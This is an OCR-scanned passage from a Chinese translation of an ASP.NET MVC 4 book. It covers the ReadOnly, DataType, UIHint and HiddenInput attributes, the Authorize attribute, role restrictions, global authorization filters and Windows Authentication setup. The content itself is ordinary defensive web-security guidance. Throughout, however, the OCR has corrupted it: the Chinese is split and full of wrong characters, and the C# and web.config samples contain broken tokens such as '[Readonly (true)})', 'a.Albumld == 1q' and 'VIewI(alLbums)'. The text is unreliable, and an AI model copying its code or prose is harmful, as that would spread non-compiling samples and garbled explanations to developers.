如 果 需 要 确保 默认 的 模型 绑 定 器 不 使 用 请 求 中 的 新 值 来 更 新 属性 ， 可 在 属性 上 添加 
ReadOnly 特性 : 
[Readonly (true)}) | 
public decimal Total { get; Set | 
注意 这 里 的 EditorForModel 辅助 方法 仍 会 为 Total 属性 显示 一 个 可 用 的 输入 元 素 ， 因 
此 ， 只 有 模型 绑 定 器 考虑 ReadOnly 特性 。 


6.3.5 Datalype 


DataType 特性 可 为 运行 时 提供 关于 属性 的 特定 用 途 信息 。 例 如 ，String 类 型 的 属性 可 
应 用 于 很 多 场合 可 以 保存 e-mail 地 址 、URL 或 是 密码 。DataType 特性 可 以 满足 所 有 这 
些 和 需求 。 如 果 看 过 MVC Mnusic Store 的 账户 登录 模型 ， 就 会 发 现下 而 的 代码 : 


[Requlired | 

[DataType (DataType .Password)| 
[Display (Name="Password")] 

public string Password 1{ get; set } 


对 于 一 个 Name 参数 为 Password 的 DataType, ASPNET MVC 中 的 HTML 编辑 器 辅助 
方法 就 会 泻 染 一 个 type 特性 值 为 “password” 的 输入 元 素 。 这 就 意味 看 当 在 浏览 右 中 输入 
密码 时 ， 就 看 不 到 输入 的 字符 了 (如 图 6-11 所 示 )。 
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Password 


图 6-11 

其 他 数据 类 型 还 有 Currency、Date、Time 和 MultilineText。 
6.3.6 UIHint 

UIHint 特性 给 ASPNET MVC 运行 时 提供 了 一 个 模板 名 称 , 以 备 调用 模板 辅助 方法 (如 
DisplayFor 和 EditorFonD) 泻 染 输出 时 使 用 。 也 可 定义 目 己 的 模板 辅助 方法 来 重 写 ASPNET MVC 
的 默认 行为 ， 第 16 章 将 介绍 如 何 目 定义 模板 。 
6.3./ Hiddenlnput 

HiddenInput 在 名 称 空间 System.Web.Mvc 中 ， 它 可 以 告知 运行 时 演 染 一 个 tfype 特性 值 
为 “hidden” 的 输入 元 素 。 隐 泸 输 入 可 以 很 好 地 保存 表单 中 信息 ， 但 用 户 在 浏览 右 中 不 能 
看 到 ， 也 不 能 编辑 这 些 数 据 ( 因 为 恶意 用 户 可 以 通过 改变 提交 的 表单 值 来 改变 输入 值 ， 所 以 
不 要 想当然 地 认为 这 个 特性 是 万 无 一 失 的 )， 以 便 浏览 占 将 原 有 数据 人 返回 给 服务 絮 。 


6.4 小结 


本 章 首 先 介绍 了 应 用 于 验证 的 数据 注解 , 接 者 介绍 了 ASPNET MVC 运行 时 如 何在 Web 
应 用 程序 中 使 用 模型 元 数据 、 模 型 绑 定 器 以 及 HTML 辅助 方法 来 构建 良好 的 验证 逻辑 。 这 
些 验证 不 需要 重复 的 代码 就 可 以 在 服务 器 端 和 客户 端 都 提供 验证 特性 。 还 介绍 了 如 何 为 自 
定义 的 验证 逻辑 构建 自 定义 的 注解 ， 并 与 自 验 证 模型 进行 了 比较 。 最 后 阐述 了 如 何 使 用 数 
据 注 解 来 影响 视图 中 HTML 辅助 方法 的 HTML 输出 。 
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本 章 主要 内 容 

e 要 求 用 Authorize 特性 登录 

。 要 求 角色 成 员 使 用 Authorize 特性 
e Web 应 用 程序 中 安全 向 量 的 用 法 


保护 Web 应 用 程序 的 安全 性 看 起 来 是 件 苦 差事 。 这 件 必 须要 做 的 工作 并 不 能 带 来 太 多 
乐趣 。 但 是 为 了 回避 尴 傣 的 安全 漏洞 问题 ， 程 序 的 安全 性 通常 还 是 不 得 不 做 的 。 

的 确 ,“ 安 全 ” 听 起 来 并 不 像 有 太 多 乐趣 。 通 常情 况 下 ， 介 绍 安 全 性 的 章节 的 内 容 要 
么 是 大 胆 承 话 ， 要 么 是 专横 无 理 。 本 书 的 作者 也 读 过 这 方面 的 相关 书籍 ， 他 们 清楚 地 意识 
到 不 能 滥用 读者 的 信任 。 简 而 言 之 ， 本 章 确 实 非常 重要 ， 和 希望 本 章 能 够 为 您 提供 足够 丰富 
的 信息 。 


ASPNET Web Forms 开发 人 员 : 我 们 不 在 堪萨斯 州 ! 

因为 ASPNET MVC 不 像 ASPNET Web Forms 那样 提供 了 很 多 自动 保护 机 制 来 保护 页 
面 不 受 恶意 用 户 的 攻击 ， 所 以 必须 阅读 本 章 来 了 解 这 方面 的 知识 。 更 明确 地 说 ，ASPNET 
Web Forms 致力 于 使 应 用 程序 免 受 攻击 。 例 如 : 

e 服务 器 组 件 对 显示 的 值 和 特性 进行 HTML 编码 ， 以 帮助 阻止 XSS 攻击 。 

e 加 密 和 验证 视图 状态 ， 从 而 帮助 阻止 算 改 提交 的 表单 。 

e 请 求 验证 (%@page validaterequest="true"9%0) 蕉 获 看 起 来 是 恶意 的 数据 ， 并 给 出 警告 

(这 是 ASPNET MVC 框架 默认 开启 的 保护 )。 
e 事件 验证 帮助 阻止 注入 攻击 和 提交 无 效 值 。 
转向 ASPNET MVC 意味 着 这 些 问题 的 处 理 落 到 了 程序 员 的 肩 上 一 一 对 于 某 些 人 来 说 
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可 能 会 引起 恐慌 ， 而 对 另 一 些 人 来 说 可 能 是 一 件 好 事 。 

如 果 认 为 框架 “就 应 该 处 理 这 种 事情 ”的 话 ， 那 么 确实 有 一 种 框架 可 以 处 理 这 一 类 
事情 ， 而 且 处 理 得 很 好 ， 它 就 是 ASPNET Web Forms。 然 而 ， 其 代价 就 是 失去 了 一 些 控制 ， 
因为 ASPNET Web Forms 引入 了 抽象 层次 。 

ASPNET MVC 对 标记 和 程序 的 运行 提供 了 更 多 控制 ， 这 意味 看 程序 员 要 承担 更 多 责 
任 。 要 明确 的 是 ，ASPNET MVC 提供 了 许多 内 和 置 的 保护 机 制 (例如 ， 默认 利用 HTML 辅助 
方法 和 Razor 语法 进行 HTML 编码 以 及 请 求 验证 等 功能 特性 )。 然 而 ， 如 果 不 理解 Web 的 
安全 机 制 一 一 这 些 正 是 本 章 所 讲 的 内 容 ， 就 很 容易 搬 起 石头 砸 自己 的 脚 。 


之 所 以 应 用 程序 存在 安全 隐患 ， 主 要 是 因为 开发 人 员 缺 乏 足够 的 信息 或 理解 。 我 们 想 
要 改变 这 一 局 面 ， 但 是 我 们 也 意识 到 人 无 完 人 ， 难 免 有 玖 忽 的 时 候 。 鉴 于 此 ， 请 记 住 这 里 
的 锅 吉 妙语， 这 也 是 本 章 的 关键 总 结语 句 : 

e 永远 都 不 要 相信 用 户 提供 的 任何 数据 。 

e 每 当 泻 染 作 为 用 户 输 入 而 引入 的 数据 时 ， 请 对 其 进行 HTML 编码 (如 果 数 据 作为 特 

性 值 显示 ， 就 应 对 其 进行 HTML 特性 编码 (HTML-attribute-encode))。 

e 考虑 好 网 站 的 哪些 部 分 允许 匿名 访问 ， 哪 些 部 分 要 求 认证 访问 。 
不 要 试图 目 己 净化 用 户 的 HTML 输入 (使 用 白 名 单 或 其 他 方法 ) 一 一 否则 惑 会 失败 。 
在 不 需要 通过 客户 端 脚本 (大 部 分 情况 下 ) 访 问 cookie 时 ， 使 用 HTTP-only cookie。 

e 请 记 住 ， 外 部 输入 不 是 显 式 的 表单 域 ， 因 为 它 包 括 URL 查询 字符 串 、 隐 藏 表单 域 、 

Ajax 请 求 以 及 我 们 使 用 的 外 部 Web 服务 结果 等 。 

e 强烈 建议 使 用 AntiXSS 库 (www.codeplex.com/AntiXSS)。 

显而易见 ， 还 有 很 多 需要 学 习 的 内 容 一 一 包括 一 些 常见 攻击 的 工作 原理 及 其 背后 的 意 
图 。 所 以 要 紧 跟 作者 的 思路 ， 接 下 来 将 揣测 用 户 的 想法 ， 当 然 那 些 试 图 攻击 我 们 站 点 的 人 
也 算是 用 户 。 这 样 您 就 有 了 敌人 ， 他 们 正在 等 待 您 构建 应 用 程序 ， 好 让 他 们 过 来 攻破 它 。 
如 果 以 前 没有 过 到 过 这 种 情况 ， 那 么 可 能 的 原因 不 外 乎 以 下 两 种 : 

e 到 目前 为 止 还 没有 构建 过 应 用 程序 。 

e 以 前 没有 发 现 有 人 攻击 目 己 的 应 用 程序 。 

黑客 、 解 密 高 手 、 垃 圾 邮件 发 送 者 、 病 毒 、 恶 意 软 件 一 一 它们 都 想 进 入 计算 机 并 查看 
里 面 的 数据 。 在 阅读 本 段 内 容 时 ， 我 们 的 电子 邮箱 很 可 能 已 经 转发 了 很 多 封 电子 邮件 。 
我 们 的 端口 遭 到 了 扫描 ， 而 一 个 自动 化 的 蠕虫 很 有 可 能 正在 尝试 通过 各 种 操作 系统 漏洞 找 
到 进入 PC 的 途径 。 由 于 这 些 攻 击 都 是 自动 的 ， 因 此 它们 在 不 断 地 探索 ， 寻 找 一 个 开放 的 

开始 介绍 本 章 内 容 似乎 有 些 艰难 ; 然而 需要 立刻 理解 的 一 点 是 : 这 并 不 是 个 人 问题 ， 
不 能 与 个 人 问题 等 同 看 待 。 事 实 上 ， 有 人 认为 所 有 计算 机 (以 及 其 中 的 信息 ) 都 是 等 待 捕获 
的 “ 猪 物 ” 

同时 ， 应 用 程序 的 构建 基于 这 样 一 个 假设 ， 即 只 有 特定 用 户 才能 执行 某 些 操作 ， 而 其 
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他 用 户 则 不 能 执行 这 些 操作 。 开 发 人 员 和 希望 的 应 用 程序 使 用 方式 和 黑客 的 使 用 方式 之 间 有 
-条 不 可 逾越 的 鸿沟 。 本 章 将 讲解 如 何 利用 成 员 资 格 、 授 权 和 ASPNET MVC 中 提供 的 安 
全 特性 来 应 对 用 户 以 及 那些 在 线 攻击 的 匿名 群体 。 
章 首先 介绍 如 何 使 用 ASPNET MVC 中 的 安全 特性 来 执行 像 授权 这 样 的 应 用 功能 ， 
然后 介绍 如 何 处 理 常见 的 安全 威胁 。 记 住 ， 尽 管 这 都 是 相同 连续 的 一 部 分 ， 但 是 确保 访 
问 ASPNET MVC 应 用 程序 的 每 个 用 户 都 能 按照 设计 的 方式 使 用 它 ， 才 是 安全 问题 的 讨论 
范畴 。 


7.1 使 用 Authorize 特性 登录 


保护 应 用 程序 安全 的 第 一 步 ， 同 时 也 是 最 简单 的 一 步 ， 就 是 要 求 登录 系统 的 用 户 访问 
那些 由 应 用 程序 指定 的 URL。 我 们 可 以 通过 使 用 控制 器 上 或 者 控制 器 内 部 特定 操作 上 的 
Authorize 操作 过 滤器 来 实现 。Authorize 特性 是 ASPNET MVC 上 自 带 的 默认 授权 过 滤器 ,可 
用 来 限制 用 户 对 操作 方法 的 访问 。 将 该 特性 应 用 于 控制 器 ， 就 可 以 快速 将 其 应 用 于 控制 器 
中 的 每 个 操作 方法 。 


身份 验证 和 授权 

人 们 有 时 对 用 户 吴 份 验 证 和 用 户 授权 之 间 的 区 别 感到 困惑 。 这 两 个 词 很 容易 混 消 ， 但 
总 的 来 讲 ， 身 份 验 证 是 指 通 过 使 用 登录 机 制 的 一 些 表单 (包含 用 户 名 /密码 、OpenID 等 说 明 
日 己 映 份 的 项 ) 来 核实 用 户 的 映 份 。 授权 验证 是 用 来 核实 登录 站 点 的 用 户 是 否 在 他 们 的 权限 
内 执行 操作 。 这 通常 使 用 一 些 基于 角色 的 系统 来 实现 。 


授权 特性 不 融 任 何 参 数 ， 只 要 求 用 户 以 条 种 角色 身份 登录 网 站 一 一 换 句 话说 ， 它 禁止 
匿名 访问 。 接 下 来 首先 介绍 如 何 实 现 茶 止 匿名 访问 , 而 后 介绍 对 特定 角色 访问 权限 的 限制 。 


7.1.1 保护 控制 器 操作 


现在 根据 一 个 非常 简单 的 购物 应 用 需求 ， 开 始 创 建 痛 乐 商 店 应 用 程序 。 程 序 中 的 
StoreController 控制 器 仅 包 含 两 个 操作 一 一 Index( 用 来 显示 专辑 列表 ) 和 Buy: 


USing SYystem.Collections.Generic; 

USinNng System.Ling; 

USing SYySsStem.Web.Mvc; 

USinNng Wrox.ProMvc4.Security.Authorize.Models; 


namespace Wrox.ProMvc4.Security.Authorize.Controllers 


| 


public class StoreController : Controller 


| 
public ActionResult Index{() 


{ 


var albums = GetAlbums ();} 
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return VIewI(alLbums) ; 


public ActionResult Buyl(int id) 


{ 
var album = Getalbums () .Single(a => a.Albumld == 1q) ， 
//Charge the user and ship 七 he album!!l! 
return View l(album),; 

} 


// A simple music catalog 
private static List<Album> GetAlbums () 


{ 
var albums = new List<Album>!1 
new Album { AlbumlId = 1, Title = "The Fall of Math"™, 
Price = 8.99M}, 
new Album { AlbumlId = 2, Title = "The Blue Notebooks", 
Price = 8.99M}, 
new Album 1{ AlbumlId = 3, Title = "Lost in Translation”, 
Price = 9.99M 1},，, 
new Album { AlbumId = 4, Title = "Permutation", Price = 10.99M |} ， 
}; 
return albums; 
} 


} 

} 

显然 ， 上 面 的 代码 没有 禁止 用 户 的 匿名 访问 。 之 所 以 这 样 ， 是 因为 目前 的 控制 器 允许 
用 户 匿名 购买 专辑 。 然 而 ， 在 实际 应 用 中 ， 当 用 户 购 买 专辑 时 ， 系 统 需要 知道 他 们 的 身份 。 
因此 ， 需 要 在 Buy 操作 上 添加 Authorize 特性 来 解决 这 个 问题 ， 代 码 如 下 所 示 : 


[Authorizel 
public ActionResult Buyl(int id) 
{ 
Var album = GetAlbums () .SiInolel(a => a.Albumld == id); 


//Charge the user and ship the album!!! 
return Viewl(album).; 


} 


如 果 想 查看 这 段 代 码 ， 可 使 用 NuGet 将 Wrox.ProMvc4.Security.Authorize 包 和 安装 在 
个 默认 的 ASPNET MVC 项 目 中 ， 命 令 如 下 所 示 : 


Install-Package Wrox.ProMyc4.Security.Authorize 


运行 应 用 程序 , 浏览 到 /Store, 将 看 到 一 个 专辑 列表 。 但 看 这 个 页 面 不 需要 登录 和 注册 ， 
如 图 7-1 所 示 。 
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二 http /localhost 30201 /Store 


| 
| 

1 

[a 


Home About Contact 


A Very Simple Store 
Title Price 

The Fall of Math 8.99 

The Blue Notebooks 8.99 

Lost in Translation 9.99 
Permutation 10.99 


© 2012 - My ASP.NET MVC Application 


图 7-1 
然而 ， 当 单 击 Buy 链接 的 时 候 ， 就 会 要 求 登 录 ( 如 图 7-2 所 示 )。 


| We 志 “eS 
| EE = 1 Legn-Mmarsnmrwc. < 


Haome Abaut Contact 


Use a local account to log in. Use another service to log in. 


User name 
There are no extermal autheniication services Comfigured 


See this artice for detalls on setting up this ASP,NET 
application to support logging in via extermal services. 
Passwaord 


「 Remember me? 


| 
Log in 
TL 


Begister if you don't have an account. 


人 


由 于 我 们 现在 还 没有 账户 ， 因 此 需要 单 击 Register 链接 ， 到 一 个 标准 账户 注册 页 面 进 
行 注 册 ， 如 图 7-3 所 示 。 
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Bd meee Dp- BEKOLgn. My Apner.. = ll 


| =e 


| 
Log in. 


Use a local account to log in. 


User name 
Password \ 


| 1 Remember mer 


| Log in 


Begister i you donthave an acoount. 


图 7-3 

完成 注册 后 ， 当 再 次 单 击 Buy 按钮 时 ， 就 会 通过 验证 检查 ， 进 入 购买 信息 确认 页 面 ， 

如 图 7-4 所 示 ( 当 然 ， 真正 投 入 使 用 的 应 用 程序 在 结算 期 间 还 要 收集 一 些 其 他 信息 ， 正 如 
MVC Music Store 应 用 程序 展示 的 那样 )。 


Home About Contact 


| You just bought Lost in Translation for 9.99 
已 2012 = wy ASP.NET MYC Application 
图 7-4 


产品 小 组 的 话 


使 用 Web Forms 保护 应 用 程序 安全 的 一 个 普 这 方法 就 是 使 用 URL 授权 。 例 如 ， 如 果 
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系统 拥有 管理 模块 并 且 限 制 只 有 Admins 角色 才能 访问 该 模块 ， 这 里 假设 把 所 有 管理 页 面 
放 在 了 Admin 文件 夹 下 ， 那 么 除了 那些 Admins 角色 外 ， 所 有 其 他 用 户 就 应 一 概 禁 止 访问 
Admin 子 文件 夹 。 如 果 使 用 ASPNET Web Forms 进行 开发 ， 就 可 以 在 网 站 的 web.config 文 
件 中 锁定 一 个 目录 ， 以 保护 该 目录 不 被 非法 访问 : 
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<location path="Admin” allowOverride="false"> 
<Ssystem.web> 
<authorization> 
<allow roles="Administrator™ /> 
<deny users="?" /> 
</authorization> 


</system.web> 
</location> 
然而 ， 在 MVC 框架 中 ， 这 种 方法 却 无 法 正常 工作 ， 原 因 有 以 下 两 点 : 


e 请 求 不 再 映射 到 物理 目录 。 
e 可 能 存在 多 种 查找 同一 控制 器 的 方式 。 
从 理论 上 讲 ，MVC 方式 可 以 拥有 一 个 封装 了 应 用 程序 管理 功能 的 AdminController， 
然后 在 根 目录 的 web.config 文件 中 设置 URL 授权 来 阻止 以 /Admin 开头 的 任何 访问 请 求 。 
然而 ， 这 未 必 是 安全 的 ， 因 为 很 有 可 能 存在 另 一 个 路 由 能 够 映射 到 AdminController。 
例如 ， 假 设 后 来 决定 要 在 默认 的 路 由 中 切换 {fcontrollery 和 {faction} 的 顺序 。 切 换 后 ， 
/Index/Admin 就 是 指向 默认 页 面 的 URL， 而 前 面 设置 的 URL 授权 将 不 能 阻止 对 这 个 URL 
的 访问 。 
实现 安全 性 的 一 个 好 方法 是 ， 始 终 使 安全 性 检查 尽 可 能 地 接近 要 保护 的 对 象 。 可 能 有 
其 他 高 于 堆栈 的 检查 ， 但 最 终 都 要 确保 实际 资源 的 安全 。 这 样 无 论 用 户 如 何 获得 资源 ， 该 
方式 都 会 对 其 进行 安全 性 检查 。 这 样 就 不 必 依赖 路 由 和 URL 授权 来 确保 控制 旧 安 全 了 ; 而 
真正 只 需要 保护 控制 器 本 身 的 安全 。Authorize 特性 就 起 这 个 作用 。 
e ”如 果 不 指定 调用 操作 方法 的 角色 和 用 户 ， 就 必须 简单 地 验证 当前 用 户 ， 使 其 能 
调用 这 一 操作 方法 。 虽 然 很 简单 ， 但 这 样 可 以 阻止 来 目 特 定 控 制 器 操作 的 未 授权 
用 户 。 

e 如 果 用 户 党 试 访问 应 用 了 这 个 特性 的 操作 方法 ， 那 么 在 授权 检查 失败 的 情况 下 ， 
过 滤器 就 会 引发 服务 器 返回 一 个 “401 未 授权 ”HTTP 状态 码 。 

e 如 果 在 web.config 文件 中 启用 了 表单 身份 验证 并 指定 了 登录 URL 地 址 ,那么 ASPNET 
就 会 处 理 这 个 啊 应 代码 ， 并 将 用 户 重 定 癌 到 登录 页 面 。 这 是 一 个 ASPNET 已 有 的 
行为 ， 因 此 对 于 ASPNET MVC 并 不 是 新 内 容 。 


7.1.2 Authorize 特性 在 表单 身份 验证 和 AccountController 控制 器 中 的 用 法 


上 面 例子 在 后 台 是 如 何 操作 的 呢 ? 显而易见 , 我 们 并 没有 手动 编写 代码 (控制 妖 或 视图 ) 
来 处 理 登 录 和 注册 的 URL， 那 它们 是 从 哪里 生成 的 呢 ?” 原 来 ASPNET MVC 的 Intemet 
Application 模板 包含 一 个 基本 的 AccountController, 它 文 持 ASPNET Membership 和 OAuth 
验证 的 账户 管理 。 

Authorize 特性 是 一 个 过 滤器 ,也 就 是 说 , 它 能 先 于 相关 控制 器 操作 执行 。 即 Authorize 
特性 首先 执行 它 在 OnAuthorization 方法 中 的 主要 操作 , 这 是 一 个 在 接口 IauthorizationFilter 
中 定义 的 标准 方法 。 查 看 MVC 源 代 人 码 , 就 可 以 看 到 基本 的 安全 检查 机 制 正在 核实 ASPNET 
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上 下 文中 存储 的 基本 身份 验证 信息 : 


IPrincipal user = httpContext.User; 
1 (iuser.Identity.1IsAuthenticated) 
| 

return false; 
} 


如 条 用 户 身 份 验证 失败 ， 就 会 返回 一 个 HttpUnauthorizedResult 操作 结果 ， 它 产生 一 个 
HTTP 401( 未 授权 ) 的 状态 码 。 这 个 401 状态 码 被 FormsAuthenticationModule 的 Onleave 方 
法 截获 ， 并 转 而 重 定 加 到 在 应 用 程序 web.config 文件 中 定义 的 登录 页 面 ， 代 码 如 下 : 

<authentication mode="Forms"> 


<forms loginUrl="~/Account/LogOn™ timeout="2880"™ /> 
</authentication> 


这 个 重 定 问 地 址 包含 一 个 返回 URL， 以 便 成 功 登录 系统 后 ，Account/LogOn 操作 可 以 
重 定 向 到 最 初 的 请 求 页 面 。 


作为 安全 向 量 打 开 重 定向 
登录 重 定 同 过 程 是 开放 重 定 同 攻 击 的 一 个 目标 ， 因 为 攻击 者 可 以 制作 一 些 恶 意 的 登录 
URL， 这 些 URL 可 以 把 用 户 重 定 同 到 有 害 网 站 。 本 章 后 面部 分 就 会 介绍 这 种 威胁 。 
ASPNET MVC 框架 的 Internet Application 模板 提供 了 AccountController 控制 器 及 其 关 
联 的 所 有 视图 ， 这 一 点 很 好 ， 因 为 这 样 束 可 以 在 个 单 的 应 用 场合 中 轻松 地 添加 授权 ， 而 不 
需要 编写 任何 额外 的 代码 ， 也 不 需要 添加 任何 额外 的 配置 。 
锦上添花 的 是 ， 还 可 以 修改 下 面 这 些 部 分 : 
e AccountController( 及 其 关联 的 Account 模型 和 视图 ) 是 一 个 标准 的 ASPNET MVC 
控制 器 ， 它 很 容易 修改 。 
e 授权 调用 不 利于 标准 的 ASPNET Membership 提供 器 机 制 ， 该 机 制定 义 在 web.config 
文件 中 的 <authorization> 部 分 。 这 里 可 以 切换 提供 器 ， 或 者 自行 编写 提供 器 。 
e Authorize 是 一 个 实现 了 LIAuthorizeFilter 接口 的 标准 授权 特性 。 当 然 也 可 以 创建 目 
己 的 授权 过 小 器。 
7.1.3 Intranet Application 模板 中 的 Windows Authentication 


Intranet Application 模板 (包含 在 ASPNET MVC 3 Tools Update 及 其 后 续 版 本 中 ) 与 
Internet Application 模板 非常 相似 ， 有 一 点 不 同 的 是 : 它 用 Windows Authentication 替换 了 
窗 体 Authentication 。 

因为 使 用 Windows Authentication 可 在 Web 应 用 程序 之 外 处 理 Registration 和 Log On 操作 ， 
该 模板 不 要 求 提供 AccountController 及 其 相关 模型 和 视图 。 为 配置 Windows Authentication， 
它 在 web.config 文件 中 包含 了 下 面 一 行 代码 : 


<authentication mode="Windows" /> 
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该 模板 还 包含 一 个 readme.txt 文件 ， 其 中 包含 了 如 何在 IS 和 ISS Express 中 配置 
Windows Authentication 的 指令 。 为 使 用 Intranet 模板 ， 我 们 需要 启用 Windows 验证 ， 禁 用 
Anonymous 验证 。 

1. lIS7 和 |S8 


(1) 打开 IS 管理 器 并 导航 到 创建 的 站 点 。 

(2) 在 Features 视图 中 ， 双 击 Authentication 选项 。 

(3) 在 Authentication 页面 中 选择 Windows Authentication 选项 。 如 果 没 有 Windows 
Authentication 这 个 选项 ， 就 要 在 服务 器 上 安装 Windows Authentication。 在 Windows 中 ， 
启用 Windows Authentication 的 步 又 如 下 : 

1) 在 Control Panel 中 打开 Programs and Features 页 面 。 

2) 将 页 面 中 的 Tum Windows Features 设置 为 On 或 Off。 

3) 导航 到 Internet Information Services | World Wide Web Services | Security 下 并 确保 选 
择 了 Windows Authentication 万 点 。 

为 在 Windows Server 中 启用 Windows 验证 ， 执 行 如 下 步骤 : 

1) 在 Server Manager 中 ， 选 择 Web Server(IIS)， 并 单 击 Add Role Services。 

2) 导航 到 Web Server|Security， 并 选择 Windows 验证 节点 。 

(4) 在 Actions 窗 格 中 ， 单 击 Enable 来 启用 Windows Authentication。 

(5) 在 Authentication 页 耐 中， 选择 Anonymous Authentication 选项 。 

(6) 在 Actions 窗 格 中 ， 单 击 Disable 来 禁止 匿名 身份 验证 。 


2. 1|S Express 


要 在 IS Express 中 配置 Windows Authentication， 可 按照 如 下 步骤 来 操作 ; 
(1) 在 Solution Explorer 中 选择 项 目 。 
(2) 如 果 Properties 窗口 没有 打开 ， 就 按 F4 键 将 其 打开 。 
(3) 在 Properties 窗 格 中 设 管 如 下 选项 : 
e 将 Anonymous Authentication 设置 为 Disabled。 
e 将 Windows Authentication 设置 为 Enabled.。 
7.1.4 ”整个 控制 器 的 安全 性 
前 面 的 例子 已 经 展示 了 如 何 将 Authorize 特性 应 用 于 单个 控制 器 的 特定 控制 费 操 作 。 
- 段 时 间 后 , 我 们 可 能 会 意识 到 站 点 浏览 、 购 物 车 及 结算 部 分 分 别 再 要 一 个 单独 的 控制 器 。 
- 些 操作 是 与 匿名 购物 车 (得 看 购物 车 、 癌 购物 车 染 加 商品 、 从 购物 车 中 删除 商品 ) 和 喘 份 
验证 结算 (添加 地 址 和 文 付 信息 、 完 成 结算 ) 相 关联 的 。 对 结算 过 程 要求 授 权 可 以 在 MVC 
Music Store 应 用 场合 中 透明 地 实现 从 (匿名 的 ) 购 物 车 到 (要 求 注册 的 ) 结 算 的 过 渡 。 可 以 通过 
在 控制 器 CheckoutController 上 添加 Authorize 特性 来 满足 结算 对 授权 的 要 求 ， 代 人 码 如 下 : 
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[Authorizel| 

Public class CheckoutController : Controller 

这 样 就 使 得 控制 各 CheckoutController 中 的 所 有 操作 都 允许 注册 用 户 访 问 ,但 禁止 匿名 
访问 。 
7.1.5 使 用 全 局 授权 过 滤器 保障 整个 应 用 程序 安全 


对 于 大 部 分 网 站 来 说 ， 基 本 上 整个 应 用 程序 都 是 需要 授权 的 。 这 种 情形 下 ， 默 认 授 权 
要 求 和 匿名 访问 少数 网 页 (比如 主页 和 一 些 登 录 有 关 的 页 面 ) 就 变 得 极其 简单 。 因 此 ， 把 
AuthorizeAttribute 配置 为 全 局 过 滤器 ， 使 用 AllowAnonymous 特性 匿名 访问 指定 控制 器 或 
方法 ， 就 变 成 了 不 错 的 想法 。 

为 将 AuthorizeAttribute 注册 为 全 局 过 滤器 ， 需 要 把 它 添 加 到 RegisterGlobalFilters 中 的 
全 局 过 滤器 集合 : 

public static Vvoid RegisterGlobalFilters (GlobalFiltercCcollection filters) | 

filters.Add (new System.Web.Mvc.AuthorizeAttribute()); 
filters.Add (new HandleErrorAttribute());} 

} 

这 样 就 会 把 AuthorizeAttribute 应 用 到 整个 程序 的 所 有 控制 右 操 作 。 显 而 易 见 ， 这 样 也 
限制 了 对 整个 网 站 的 访问 ， 其 中 包括 对 AccountController 的 访问 。 在 MVC 4 之前， 我 们 
如 果 想 利用 全 局 过 滤器 来 进行 验证 ， 就 不 得 不 进行 一 些 特殊 处 理 以 便 能 够 匿名 访问 
AccountController。 一 种 常用 方法 是 使 用 AuthorizeAttribute 的 子 类 ， 在 其 子 类 中 实现 一 些 
额外 迎 辑 来 文 持 对 特定 操作 的 访问 。MVC 4 中 新 添加 了 AllowAnonymous 特性 。 我 们 可 以 
把 AuthorizeAttribute 放 在 任何 方法 (或 整个 控制 右 ) 来 选择 所 需 的 授权 。 

举 一 个 例子 ， 当 使 用 Intemet Application 模板 创建 新 的 MVC 4 应 用 程序 时 ， 我 们 可 以 
看 到 默认 的 AccountController。 如 果 把 AuthorizeAttribute 注册 为 全 局 过 滤器 ， 并 且 所 有 方 
法 都 需要 外 部 访问 ， 那 么 这 些 方法 只 需要 用 AllowAnonymous 特性 装饰 即 可 。 例如 ，Login 
HTTP Get 操作 的 代码 如 下 所 示 : 

/1 


// GET: /Account/Login 


[AllowAnonymous | 
public ActionResult Login () 
{ 
return ContextDependentView |(); 


} 


这 样 一 来 ， 即 便 把 AuthorizeAttribute 注册 为 全 局 过 滤器 ， 用 户 仍 能 访问 登录 操作 。 


144 


第 7 章 成 员 资 格 、 授 权 和 安全 性 


全 局 授权 仅 对 MVC 是 全 局 的 

全 局 过 滤 右 只 针对 MVC 控制 器 操作 ， 记 住 这 一 点 很 重要 。 它 不 能 保障 Web Forms、 
静态 内 容 或 其 他 ASPNET 处 理 程序 的 安全 。 

正如 前 面 提 到 的 ，Web Forms 和 静态 资源 映射 到 文件 路 径 ， 可 使 用 web.config 文件 中 
的 authorization 元 素来 确保 它们 的 安全 。ASPNET 处 理 程 序 的 安全 性 问题 比较 复杂 ; 上 
MVC 操作 类 似 ， 一 个 处 理 程序 可 以 映射 到 多 个 URL。 

安全 处理 程序 通常 通过 ProcessRequest 方法 中 的 目 定 义 代 码 来 处 理 。 例 如 ， 可 以 检查 
User.Identity.IsAuthenticated， 并 重 定 同 ， 或 者 授权 检查 失败 ， 返 回 一 个 错误 。 


7.2 要 来 角色 成 员 使 用 Authorize 特性 


到 目前 为 止 ， 已 经 介绍 了 如 何 使 用 Authorize 特性 来 阻止 用 户 匿 名 访问 控制 器 或 控制 
器 操作 。 然 而 ， 正 如 刚才 提 到 的 ， 我 们 也 能 限制 特定 用 户 或 角色 的 访问 。 常 见 的 例子 是 将 
其 应 用 于 管理 功能 。 随 独 开 发 工作 的 进展 ， 通 过 直接 编辑 数据 库 来 编辑 专辑 目录 的 方法 已 
无 法 满足 MVC Mnusic Store 应 用 程序 的 需求 。 因 此 就 出 现 了 StoreManagerController。 

然而 ，StoreManagerController 不 允许 随机 注册 用 户 的 访问 ， 因 为 他 们 只 是 为 了 编辑 、 
添加 或 删除 专辑 才 注 册 账 尸 。 现 在 再 要 限制 特定 角色 或 用 户 的 访问 。 可 喜 的 是 ，Authorize 
特性 允许 指定 角色 和 用 户 ， 代 人 码 如 下 所 示 : 

[Authorize (Roles="Administrator™)| 

public class StoreManagerController : Controller 

这 样 一 来 ,就 使 得 只 有 属于 Administrator 角色 的 用 户 才 能 访问 StoreManagerController 
控制 器 。 匿 名 用 户 或 已 注册 但 不 属于 Administrator 角色 的 用 户 将 不 能 访问 控制 堪 Store- 
ManagerController 中 的 操作 。 

顾名思义 ，Roles 参数 可 以 有 多 个 角色 ， 我 们 可 以 给 它 传递 一 个 角色 列表 ， 角 色 之 间 用 
有 还 亏 分 陋 : 

[Authorize (Roles="Administrator, SuperAdmin")| 


public class TopSecretController:Controller 


也 可 以 授权 给 一 组 用 户 : 


[Authorize (Users="Jon, Phil,scott,Brad"™)l| 
Public class TopSecretController:Controller 


当然 ， 也 可 以 同时 授权 给 用 户 和 角色 : 


[Authorize (Roles="UsersNamedScott", Users="Jon,Phil,Brad"™)l| 
public class TopSecretController:Controller 
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何 时 以 及 如 何 使 用 用 户 和 角色 
应 该 考虑 使 用 角色 而 不 是 用 户 来 管理 权限 ， 这 通常 有 以 下 几 个 原因 : 
e 可 以 添加 和 删除 用 户 ， 而 且 对 于 一 个 特定 的 用 户 ， 筷 的 访问 权限 会 随 看 时 间 变 化 
不 断 地 变更 。 
